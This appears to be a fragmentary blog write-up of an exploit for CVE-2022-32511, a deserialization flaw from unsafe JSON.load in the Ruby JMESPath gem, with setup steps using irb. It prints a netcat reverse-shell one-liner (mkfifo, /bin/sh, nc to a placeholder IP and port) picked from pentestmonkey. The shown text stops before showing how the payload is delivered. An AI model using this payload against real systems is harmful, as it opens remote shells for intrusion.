CVE-2022–32511 | Exploit | Remote Code Execution

CVE-2022–32511 | Exploit | Remote Code Execution
CVE-2022–32511 | Exploit | Remote Code Execution | by HeyDanny - Dhanesh Dodia | Jun, 2022 | InfoSec Write-ups







Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input.

  • In order to reproduce the steps we first require to install ‘JMESPath 1.6.0’ or before:


  • 2. To import the library fire ‘Interactive Ruby Shell’ with the following mentioned command:


    irb

    3. In case if you don’t have ‘irb’ installed than use the following command to download the same:


    gem install irb

    4. Pick a desired payload, I have picked one from pentestmonkey





    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f

    32511 exploit remote execution